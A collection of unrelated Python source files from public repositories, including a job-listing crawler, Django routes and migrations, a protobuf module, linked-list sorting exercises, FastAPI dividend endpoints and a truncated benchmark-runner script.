repo_name: barry800414/JobTitleNLP | branch_name: refs/heads/master | snapshot_id: 98622d02b25b1418f28698f7d772c8de96642032 | revision_id: b379c2052447e6483d17f5db51fb918b37ac7a52
detected_licenses: [] | license_type: no_license
visit_date: 2021-06-08T19:36:39.044757 | revision_date: 2016-10-21T03:11:10 | committer_date: 2016-10-21T03:11:10
github_id: 66,043,111 | star_events_count: 1 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#!/usr/bin/env python3
# invoke 104 API to get all 104 jobs
import sys
import requests
import json
from getCat import getL3ID
API_URL = "http://www.104.com.tw/i/apis/jobsearch.cfm"
def getJobsByCatID(catID, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J"
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 1:
print(r.url, r.status_code)
p = r.json()
nPage = int(p['TOTALPAGE'])
for i in range(0, nPage):
jobs.update(__getJobsByCatID(catID, i+1, verbose))
except Exception as e:
print(e, file=sys.stderr)
return jobs
def __getJobsByCatID(catID, page, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J,JOB,JOBCAT_DESCRIPT,NAME",
"page": page
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 2:
print(r.url, r.status_code)
p = r.json()
for d in p['data']:
cat = [c for c in d['JOBCAT_DESCRIPT'].split('@') if c != "類目"]
jobs[d['J']] = { "title": d['JOB'], "cat": cat, 'company_name': d['NAME'] }
except Exception as e:
print(e, file=sys.stderr)
return jobs
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage:', sys.argv[0], 'category outJsonFile', file=sys.stderr)
exit(-1)
with open(sys.argv[1], 'r') as f:
rawCat = json.load(f)
cat = getL3ID(rawCat)
# all job category ids
allJobs = dict()
for i, (catID, catName) in enumerate(cat.items()):
print('(%d/%d) Start crawling Category %s(%s):' % (i+1, len(cat), catName, catID), end='', flush=True)
jobs = getJobsByCatID(catID)
print('%d' % len(jobs), flush=True)
allJobs[catName] = jobs
with open(sys.argv[2], 'w') as f:
json.dump(allJobs, f, indent=1, ensure_ascii=False)
authors: ["[email protected]"]

---

blob_id: a3ddfd87f910aeddaeb2fdccc180e2928ab42be7 | directory_id: bc441bb06b8948288f110af63feda4e798f30225 | content_id: 692c20775b418cfdc51ab0f6e6720297f4eb1271
path: /object_store_sdk/model/notify/subscriber_pb2.py | extension: py | length_bytes: 5,376
repo_name: easyopsapis/easyops-api-python | branch_name: refs/heads/master | snapshot_id: 23204f8846a332c30f5f3ff627bf220940137b6b | revision_id: adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
detected_licenses: ["Apache-2.0"] | license_type: permissive
visit_date: 2020-06-26T23:38:27.308803 | revision_date: 2020-06-16T07:25:41 | committer_date: 2020-06-16T07:25:41
github_id: 199,773,131 | star_events_count: 5 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: true
content:
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: subscriber.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_store_sdk.model.notify import subscribe_info_pb2 as object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='subscriber.proto',
package='notify',
syntax='proto3',
serialized_options=_b('[email protected]/contracts/protorepo-models/easyops/model/notify'),
serialized_pb=_b('\n\x10subscriber.proto\x12\x06notify\x1a\x32object_store_sdk/model/notify/subscribe_info.proto\"\xab\x01\n\nSubscriber\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05\x61\x64min\x18\x02 \x01(\t\x12\x10\n\x08\x63\x61llback\x18\x03 \x01(\t\x12\x0f\n\x07\x65nsName\x18\x04 \x01(\t\x12\x0f\n\x07procNum\x18\x05 \x01(\x05\x12\x0f\n\x07msgType\x18\x06 \x01(\x05\x12\r\n\x05retry\x18\x07 \x01(\x05\x12,\n\rsubscribeInfo\x18\x08 \x03(\x0b\x32\[email protected]/contracts/protorepo-models/easyops/model/notifyb\x06proto3')
,
dependencies=[object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2.DESCRIPTOR,])
_SUBSCRIBER = _descriptor.Descriptor(
name='Subscriber',
full_name='notify.Subscriber',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='notify.Subscriber.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='admin', full_name='notify.Subscriber.admin', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='notify.Subscriber.callback', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ensName', full_name='notify.Subscriber.ensName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='procNum', full_name='notify.Subscriber.procNum', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='msgType', full_name='notify.Subscriber.msgType', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retry', full_name='notify.Subscriber.retry', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribeInfo', full_name='notify.Subscriber.subscribeInfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=81,
serialized_end=252,
)
_SUBSCRIBER.fields_by_name['subscribeInfo'].message_type = object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2._SUBSCRIBEINFO
DESCRIPTOR.message_types_by_name['Subscriber'] = _SUBSCRIBER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Subscriber = _reflection.GeneratedProtocolMessageType('Subscriber', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBER,
'__module__' : 'subscriber_pb2'
# @@protoc_insertion_point(class_scope:notify.Subscriber)
})
_sym_db.RegisterMessage(Subscriber)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
authors: ["[email protected]"]

---

blob_id: 1b33a0d2e211750824ab74b353f3eec8b0a32f06 | directory_id: 6e2dfbf50c1def19cd6ae8e536a2ddb954a5ad63 | content_id: 3e96f112a8763f74066d46caa470404c48356c44
path: /predict.py | extension: py | length_bytes: 3,096
repo_name: boshining/NeuronBlocks | branch_name: refs/heads/master | snapshot_id: 9d71f087772eb17c3a4130d0374818cfd80d976f | revision_id: 74fbb8658fb3f1cffea5c9bc84b2a1da59c20dd9
detected_licenses: ["BSD-3-Clause", "LGPL-2.1-or-later", "MIT", "GPL-3.0-only", "Apache-2.0"] | license_type: permissive
visit_date: 2020-05-27T16:24:10.244042 | revision_date: 2019-08-06T07:37:55 | committer_date: 2019-08-06T07:37:55
github_id: 188,699,703 | star_events_count: 0 | fork_events_count: 0
gha_license_id: MIT | gha_event_created_at: 2019-08-06T08:19:55 | gha_created_at: 2019-05-26T15:23:06 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from settings import ProblemTypes, version
import os
import argparse
import logging
from ModelConf import ModelConf
from problem import Problem
from LearningMachine import LearningMachine
def main(params):
conf = ModelConf('predict', params.conf_path, version, params, mode=params.mode)
problem = Problem('predict', conf.problem_type, conf.input_types, None,
with_bos_eos=conf.add_start_end_for_seq, tagging_scheme=conf.tagging_scheme, tokenizer=conf.tokenizer,
remove_stopwords=conf.remove_stopwords, DBC2SBC=conf.DBC2SBC, unicode_fix=conf.unicode_fix)
if os.path.isfile(conf.saved_problem_path):
problem.load_problem(conf.saved_problem_path)
logging.info("Problem loaded!")
logging.debug("Problem loaded from %s" % conf.saved_problem_path)
else:
raise Exception("Problem does not exist!")
if len(conf.predict_fields_post_check) > 0:
for field_to_chk in conf.predict_fields_post_check:
field, target = field_to_chk.split('@')
if not problem.output_dict.has_cell(target):
raise Exception("The target %s of %s does not exist in the training data." % (target, field_to_chk))
lm = LearningMachine('predict', conf, problem, vocab_info=None, initialize=False, use_gpu=conf.use_gpu)
lm.load_model(conf.previous_model_path)
logging.info('Predicting %s with the model saved at %s' % (conf.predict_data_path, conf.previous_model_path))
lm.predict(conf.predict_data_path, conf.predict_output_path, conf.predict_file_columns, conf.predict_fields)
logging.info("Predict done! The predict result: %s" % conf.predict_output_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Prediction')
parser.add_argument("--conf_path", type=str, help="configuration path")
parser.add_argument("--predict_data_path", type=str, help='specify another predict data path, instead of the one defined in configuration file')
parser.add_argument("--previous_model_path", type=str, help='load model trained previously.')
parser.add_argument("--predict_output_path", type=str, help='specify another prediction output path, instead of conf[outputs][save_base_dir] + conf[outputs][predict_output_name] defined in configuration file')
parser.add_argument("--log_dir", type=str)
parser.add_argument("--batch_size", type=int, help='batch_size of each gpu')
parser.add_argument("--mode", type=str, default='normal', help='normal|philly')
parser.add_argument("--force", type=bool, default=False, help='Allow overwriting if some files or directories already exist.')
parser.add_argument("--disable_log_file", type=bool, default=False, help='If True, disable log file')
parser.add_argument("--debug", type=bool, default=False)
params, _ = parser.parse_known_args()
assert params.conf_path, 'Please specify a configuration path via --conf_path'
if params.debug is True:
import debugger
main(params)
authors: ["[email protected]"]

---

blob_id: c6ddac9e303b762b38d565c374ec231de78f1052 | directory_id: aac63f0f178945e8109f74ebb9bbb59165185172 | content_id: e0d7f3b27f0854cb4fa0912eb93b73f36dddd8c4
path: /news/urls.py | extension: py | length_bytes: 810
repo_name: okumujustine/hacker-news-clone | branch_name: refs/heads/main | snapshot_id: 587f7e88f53d576ee58e5dfff78f4d18e046b4db | revision_id: 7f70d18325c7627237de719e04bdde9ad75a8d5d
detected_licenses: [] | license_type: no_license
visit_date: 2023-01-02T13:41:37.825072 | revision_date: 2020-11-04T14:52:41 | committer_date: 2020-11-04T14:52:41
github_id: 310,032,396 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
from apps.core.views import signup
from apps.story.views import frontpage, search, submit, newest, vote, story
urlpatterns = [
path('', frontpage, name='frontpage'),
path('s/<int:story_id>/vote/', vote, name='vote'),
path('s/<int:story_id>/', story, name='story'),
path('u/', include('apps.userprofile.urls')),
path('newest/', newest, name='newest'),
path('search/', search, name='search'),
path('submit/', submit, name='submit'),
path('signup/', signup, name='signup'),
path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),
path('logout/', views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
]
authors: ["[email protected]"]

---

blob_id: fc6b3d226bbf27414b9873a6166718c97218c228 | directory_id: 16fcf452e6165a0de5bc540c57b6e6b82d822bb1 | content_id: 7a9891325874d47ce4779e35a821980c21e374a2
path: /Learntek_code/4_June_18/while2.py | extension: py | length_bytes: 356
repo_name: mohitraj/mohitcs | branch_name: refs/heads/master | snapshot_id: e794e9ad2eb536e3b8e385fb8d222e8ade95c802 | revision_id: d6399b2acf69f5667c74f69715a0b55060bf19d1
detected_licenses: [] | license_type: no_license
visit_date: 2021-09-09T00:21:23.099224 | revision_date: 2021-09-07T16:39:07 | committer_date: 2021-09-07T16:39:07
github_id: 87,798,669 | star_events_count: 5 | fork_events_count: 6
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import getpass
print "Hello World "
print "Please enter the password\t"
pass1 = getpass.getpass()
flag1 =0
num =0
while True:
if pass1=="India":
print "Welcome in India"
break
else :
print "Wrong password type again"
num = num+1
print num
if num==3:
break
print "Please enter the password again\t"
pass1 = getpass.getpass()
authors: ["[email protected]"]

---

blob_id: 525379ed03b39dc09421131f1b21c85a278b744d | directory_id: ab1f25e6266a71ea23f1d3e04ec8635ae550d1df | content_id: 9dc7cb45a9f296a612d9c858867a544884bb3914
path: /HW6/Task-1/temp_HW6/person.py | extension: py | length_bytes: 293
repo_name: Pavlenkovv/e-commerce | branch_name: refs/heads/master | snapshot_id: 5143d897cf779007181a7a7b85a41acf3dfc02c4 | revision_id: 0d04d7dfe3353716db4d9c2ac55b0c9ba54daf47
detected_licenses: [] | license_type: no_license
visit_date: 2023-01-25T03:13:41.238258 | revision_date: 2020-12-06T22:16:53 | committer_date: 2020-12-06T22:16:53
github_id: 313,103,199 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
class Person:
"""Any Person"""
def __init__(self, surname=None, name=None, age=None, *args, **kwargs):
self.surname = surname
self.name = name
self.age = age
def __str__(self):
return f'Surname: {self.surname}, name: {self.name}, age: {self.age}'
authors: ["[email protected]"]

---

blob_id: 1dee9eaec67b0c0952431a177322b33833f669d8 | directory_id: 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | content_id: e9d1d4b639d2027b566b58ab2b44017d39b48e54
path: /PyTorch/contrib/cv/detection/GCNet/dependency/mmdet/models/detectors/point_rend.py | extension: py | length_bytes: 1,366
repo_name: Ascend/ModelZoo-PyTorch | branch_name: refs/heads/master | snapshot_id: 4c89414b9e2582cef9926d4670108a090c839d2d | revision_id: 92acc188d3a0f634de58463b6676e70df83ef808
detected_licenses: ["Apache-2.0", "BSD-2-Clause", "MIT", "BSD-3-Clause", "LicenseRef-scancode-generic-cla", "LicenseRef-scancode-unknown-license-reference", "GPL-1.0-or-later"] | license_type: permissive
visit_date: 2023-07-19T12:40:00.512853 | revision_date: 2023-07-17T02:48:18 | committer_date: 2023-07-17T02:48:18
github_id: 483,502,469 | star_events_count: 23 | fork_events_count: 6
gha_license_id: Apache-2.0 | gha_event_created_at: 2022-10-15T09:29:12 | gha_created_at: 2022-04-20T04:11:18 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..builder import DETECTORS
from .two_stage import TwoStageDetector
@DETECTORS.register_module()
class PointRend(TwoStageDetector):
"""PointRend: Image Segmentation as Rendering
This detector is the implementation of
`PointRend <https://arxiv.org/abs/1912.08193>`_.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(PointRend, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
authors: ["[email protected]"]

---

blob_id: 1f67fe7255fb1282c3fcc2652a59677474c9bda8 | directory_id: 784936ad8234b5c3c20311ce499551ee02a08879 | content_id: 3fcf0f3989546c699ae05960faf3d52c1bb8cec2
path: /lab4/patterns/pattern04.py | extension: py | length_bytes: 185
repo_name: jonlin97/CPE101 | branch_name: refs/heads/master | snapshot_id: 100ba6e5030364d4045f37e317aa05fd6a06cb08 | revision_id: 985d64497a9861f59ab7473322b9089bfa57fd10
detected_licenses: [] | license_type: no_license
visit_date: 2021-06-16T01:31:31.025153 | revision_date: 2017-02-28T19:29:11 | committer_date: 2017-02-28T19:29:11
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import driver
def letter(row, col):
if row in [2,3,4] and col in [3,4,5,6]:
return 'M'
else:
return 'S'
if __name__ == '__main__':
driver.comparePatterns(letter)
authors: ["[email protected]"]

---

blob_id: 1ca12f40b6da6c54896751b8fdc0c2ed2ce7ded5 | directory_id: d2fb1de19bb55e3b03db94b4fdce396fe56a223e | content_id: a24f78a2d48632ae1799cf42702c8927e03412a2
path: /caesure/ecdsa_secp256k1.py | extension: py | length_bytes: 292
repo_name: mikegogulski/caesure | branch_name: refs/heads/master | snapshot_id: 83a2a0a5d9b7c16339d54076bc54d351dbe0c3e4 | revision_id: ccee420665e3fb4e7a005241efc6832ead4b90d8
detected_licenses: ["BSD-3-Clause", "BSD-2-Clause"] | license_type: permissive
visit_date: 2021-01-22T00:02:40.058902 | revision_date: 2014-11-04T05:54:25 | committer_date: 2014-11-04T05:54:25
github_id: 26,273,215 | star_events_count: 0 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# -*- Mode: Python -*-
import caesure.secp256k1
from bitcoin import dhash
class KEY:
def __init__ (self):
self.p = None
def set_pubkey (self, key):
self.p = key
def verify (self, data, sig):
return caesure.secp256k1.verify (self.p, dhash (data), sig)
authors: ["[email protected]"]

---

blob_id: d99ff535dc1910cb9019d6f11a9939d50cc55669 | directory_id: acb7228022a36218846bc3f431e7a45057bb581d | content_id: 9c5d9d620a594b0c3db4110b7ac1bfa980b4358a
path: /mappingpedia/migrations/0003_auto_20180214_1501.py | extension: py | length_bytes: 692
repo_name: oeg-upm/mappingpedia-userinterface | branch_name: refs/heads/master | snapshot_id: c6ba106f3072a4d37c1c34573e2d72882429dd1b | revision_id: 1738b32f704bbf66f1ed8b78c99c71d49b208d43
detected_licenses: ["Apache-2.0"] | license_type: permissive
visit_date: 2021-11-03T14:34:39.044575 | revision_date: 2019-04-26T07:02:11 | committer_date: 2019-04-26T07:02:11
github_id: 111,107,643 | star_events_count: 3 | fork_events_count: 1
gha_license_id: Apache-2.0 | gha_event_created_at: 2018-02-28T11:55:04 | gha_created_at: 2017-11-17T13:40:44 | gha_language: HTML
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-02-14 15:01
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mappingpedia', '0002_auto_20180214_1409'),
]
operations = [
migrations.RenameField(
model_name='executionprogress',
old_name='result_page',
new_name='result_url',
),
migrations.AlterField(
model_name='executionprogress',
name='timestamp',
field=models.DateTimeField(default=datetime.datetime(2018, 2, 14, 15, 0, 54, 799127)),
),
]
authors: ["[email protected]"]

---

blob_id: f1da8b2e8cd2b49b4089ef7c8d1561bd7405bb9c | directory_id: de24f83a5e3768a2638ebcf13cbe717e75740168 | content_id: 6041d85fcddfaab01edb49cb3b652c18ffee68af
path: /moodledata/vpl_data/380/usersdata/348/85739/submittedfiles/testes.py | extension: py | length_bytes: 148
repo_name: rafaelperazzo/programacao-web | branch_name: refs/heads/master | snapshot_id: 95643423a35c44613b0f64bed05bd34780fe2436 | revision_id: 170dd5440afb9ee68a973f3de13a99aa4c735d79
detected_licenses: [] | license_type: no_license
visit_date: 2021-01-12T14:06:25.773146 | revision_date: 2017-12-22T16:05:45 | committer_date: 2017-12-22T16:05:45
github_id: 69,566,344 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
b = 0
a = 100
for i in range(0,a,1):
if (a%(i+1)) !=0:
b = b + 1
print(b)
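# Worked check: for a = 100, the loop tests i+1 = 1..100 and counts the values
# that do not divide 100; since 100 has 9 divisors in that range
# (1, 2, 4, 5, 10, 20, 25, 50, 100), the script prints 91.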
authors: ["[email protected]"]

---

blob_id: ea35143cdc0111cd7637ce9c09e8694f82c80c7d | directory_id: 3d91c09bca4e68bf7a527cb40ed70ac208495b93 | content_id: faa172d3cb83cc52c23cfb2b00723338c7b633e8
path: /library/migrations/0004_auto_20201128_0844.py | extension: py | length_bytes: 368
repo_name: Kaik-a/OCR-Projet13 | branch_name: refs/heads/main | snapshot_id: 02e9d8c9228d6d7a09013b4ab2570304c01dfc28 | revision_id: ac339002279397f43316e33a869cce797b5d92b2
detected_licenses: [] | license_type: no_license
visit_date: 2023-02-17T09:39:11.184120 | revision_date: 2021-01-11T15:50:58 | committer_date: 2021-01-11T15:50:58
github_id: 311,875,691 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2021-01-11T15:50:59 | gha_created_at: 2020-11-11T05:51:34 | gha_language: CSS
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# Generated by Django 3.1.3 on 2020-11-28 08:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("library", "0003_auto_20201128_0823"),
]
operations = [
migrations.AlterUniqueTogether(
name="lendedgame",
unique_together={("owned_game", "return_date")},
),
]
authors: ["[email protected]"]

---

blob_id: 7f271a553860b8386270632196e05e93106e5631 | directory_id: 5cbf6cf8a9eb958391c371c6181c49155533b6ba | content_id: 4825959173e4f80a6369e29f6246967d3a75fdf9
path: /leetcode_链表_18.排序链表(快排+归并).py | extension: py | length_bytes: 2,223
repo_name: cmychina/Leetcode | branch_name: refs/heads/master | snapshot_id: dec17e6e5eb25fad138a24deba1d2f087db416f7 | revision_id: 18e6ac79573b3f535ca5e3eaa477eac0e60bf510
detected_licenses: [] | license_type: no_license
visit_date: 2022-12-20T16:09:46.709808 | revision_date: 2020-09-28T04:04:54 | committer_date: 2020-09-28T04:04:54
github_id: 282,446,932 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
"""
链表的快排与归并排序
"""
from linklist import *
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
        Merge sort: find the midpoint; for a linked list, use fast/slow pointers
:param head:
:return:
"""
if not head or not head.next:
return head
slow,fast=head,head
while fast.next and fast.next.next:
slow=slow.next
fast=fast.next.next
right=self.sortList(slow.next)
        slow.next=None  # cut the list at the midpoint
left=self.sortList(head)
return self.mergesort(left,right)
def mergesort(self,head1,head2):
ans=ListNode(-1)
pre=ans
while head1 and head2:
if head1.val<=head2.val:
pre.next=head1
head1=head1.next
pre=pre.next
else:
pre.next=head2
head2=head2.next
pre=pre.next
if head1:
pre.next=head1
if head2:
pre.next=head2
return ans.next
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
        Quicksort
:param head:
:return:
"""
if not head or not head.next:
return head
ans = ListNode(-1)
ans.next = head
return self.quicksort(ans, None)
def quicksort(self, head, end):
if head == end or head.next == end or head.next.next == end:
return head
tmp = ListNode(-1)
partition = head.next
p = partition
        # tmp collects the nodes smaller than the pivot
t = tmp
while p.next!=end:
if p.next.val < partition.val:
t.next = p.next
t = t.next
p.next = p.next.next
            # value >= partition.val: leave the node in place and advance
else:
p = p.next
        t.next = head.next  # head.next is still the pivot chain (the nodes that stayed)
head.next = tmp.next
self.quicksort(head, partition)
self.quicksort(partition, end)
return head.next
if __name__=="__main__":
a=[4,5,3,6,1,7,8,2]
l1=convert.list2link(a)
s=Solution()
out=s.sortList(l1)
print(convert.link2list(out))
authors: ["[email protected]"]

---

blob_id: e71f2ad4ff01abe55a1af73d50b4b2075d281736 | directory_id: b2f3b7b3be11a63d5d1ddfea945439402394efe7 | content_id: 867f17a070eb93246f322a74b193cce05c8808cc
path: /routers/stock_dividends.py | extension: py | length_bytes: 2,012
repo_name: leonardoo/fast_api_stock_bvc | branch_name: refs/heads/main | snapshot_id: a8a57b9e2e3822c84829a91702ba2ce73c6ff439 | revision_id: c91b9267360ed0aacd2e98a1da9b1e3b160dc837
detected_licenses: [] | license_type: no_license
visit_date: 2023-08-13T08:05:41.064300 | revision_date: 2021-10-08T00:05:14 | committer_date: 2021-10-08T00:05:14
github_id: 383,130,473 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from typing import List
from datetime import datetime
from fastapi import APIRouter, Depends
from starlette.responses import JSONResponse
from models.stock import Stock
from models.stock_dividends import StockDividends
from models.users import User
from plugins.fastapi_users import fastapi_users
router = APIRouter(
prefix="/dividends",
tags=["dividends"],
)
def get_current_year():
return datetime.now().year
@router.post("/", response_model=StockDividends)
async def create_dividend(dividend: StockDividends, user: User = Depends(fastapi_users.current_user(verified=True))):
stock = await Stock.objects.get_or_none(nemo=dividend.nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
dividend_data = dividend.dict(exclude_unset=True)
total = dividend_data.pop("total")
paid_amount = dividend_data.pop("paid_amount")
dividend_data.pop("nemo")
dividend_data["ex_dividend_date"] = str(dividend_data["ex_dividend_date"])
dividend_data["paid_at"] = str(dividend_data["paid_at"])
dividend_data["stock_id"] = stock.id
dividend_obj = await StockDividends.objects.get_or_create(**dividend_data)
dividend_obj.total = total
dividend_obj.paid_amount = paid_amount
await dividend_obj.update()
return dividend_obj
@router.get("/", response_model=List[StockDividends])
async def get_list_dividends():
year = get_current_year()
data = StockDividends.objects.filter(paid_at__gte=f"{year}-01-01", paid_at__lt=f"{year+1}-01-01")
data = data.select_related("stock_id")
data = data.order_by("paid_at")
return await data.all()
@router.get("/{nemo}", response_model=List[StockDividends])
async def get_stock(nemo: str):
stock = await Stock.objects.get_or_none(nemo=nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
data = StockDividends.objects
data = data.filter(stock_id=stock.id)
return await data.all()
authors: ["[email protected]"]

---

blob_id: 30afc63d7c5839fede97f2925e6bbb6f93e81b28 | directory_id: e65453aecb1b64f75a4a6eee7ca1328984773d5d | content_id: 662d8a12291d456ee624881943ae9a53dc213b46
path: /Test/test1.py | extension: py | length_bytes: 5,520
repo_name: huyendtt58/raSAT | branch_name: refs/heads/master | snapshot_id: 1a9a0a1c05b81877416e82c9c102ae92c6d80931 | revision_id: b4f7c8995eef71bd099046c761ea19ea904fd18d
detected_licenses: [] | license_type: no_license
visit_date: 2021-01-19T14:27:24.036231 | revision_date: 2017-02-23T12:36:52 | committer_date: 2017-02-23T12:36:52
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import fnmatch
import os
import subprocess
import csv
matches = []
def run(directory, initLowerBound, initUpperBound, initSbox, timeout, resultFile):
lowerBound = initLowerBound
upperBound = initUpperBound
#sbox = initSbox
solvedProblems = 0
with open(os.path.join(directory, resultFile), 'wb') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', 'raSATResult', 'EQ', 'NEQ'])
csvfile.close()
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.smt2'):
print "Checking ", filename
sbox = initSbox * 10
nVars = 0
maxVars = 0
nAPIs = 0
iaTime = 0
testingTime=0
usTime=0
parsingTime=0
decompositionTime=0
miniSATTime=0
miniSATVars = 0;
time=0
miniSATCalls=0
miniSATClauses = 0
raSATClauses=0
decomposedLearnedClauses=0
UNSATLearnedClauses=0
unknownLearnedClauses=0
result='unknown'
raSATResult = 'unknown'
isEquation = '0'
isNotEquation = '0'
try:
f = open(os.path.join(root, filename))
for line in f:
if line.startswith('(set-info :status'):
result = line[18:len(line)-2]
f.close()
except IOError:
result = 'unknown'
